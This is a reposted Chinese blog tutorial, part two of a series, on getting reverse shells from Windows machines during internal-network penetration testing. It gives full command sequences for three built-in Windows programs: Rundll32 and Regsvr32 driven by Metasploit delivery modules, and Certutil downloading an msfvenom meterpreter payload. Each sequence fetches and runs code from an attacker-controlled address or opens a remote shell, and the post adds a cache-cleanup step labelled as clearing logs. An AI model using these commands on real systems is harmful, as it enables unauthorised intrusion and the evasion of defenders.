飞道的博客

内网渗透之Windows反弹shell(二)

681人阅读  评论(0)

目录

Windows反弹shell

03Rundll32.exe

04Regsvr32.exe

05Certutil.exe


Windows反弹shell

03Rundll32.exe

Rundll32.exe与Windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其储存在适当的内存库中。

通过Metasploit的SMB Delivery模块发起Rundll32攻击

use exploit/windows/smb/smb_delivery

set srvhost 192.168.1.121

exploit -j

被控端执行

rundll32.exe \\192.168.1.121\qFMnFO\test.dll,0

 

 

反弹成功

 

04Regsvr32.exe

Regsvr32.exe是一个命令行应用程序,用于注册和注销OLE控件,如Windows注册表中的dll和ActiveX控件。
Regsvr32.exe安装在Windows XP和Windows后续版本的 %systemroot%\System32 文件夹中。

语法:Regsvr32 [/s][/u][/n][/i[:cmdline]] <dllname>

/u - 注销服务器

/i - 调用Dllinstall传递一个可选的[cmdline];当它与/u一起使用时·它调用dll来卸载

/n - 不要调用DllRegisterServer;此选项必须与/i一起使用

/s - 沉默;不显示消息框

通过msf的Web Delivery模块启动Regsvr32.exe

use exploit/multi/script/web_delivery

set srvhost 192.168.1.121

set target 3

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

exploit –j

 

被控端执行

regsvr32 /s /n /u /i:http://192.168.1.121:8080/yvj3GKJwvde.sct scrobj.dll

 

反弹成功

 

05Certutil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目计算机中执行恶意的exe文件以获得meterpreter会话。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=6666 -f exe > shell.exe

 

python3 -m http.server

 

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe shell.exe

./shell.exe

 

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.121

set lport 6666

exploit

 

清除日志

certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe delete


转载:https://blog.csdn.net/m0_63127854/article/details/125852487
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场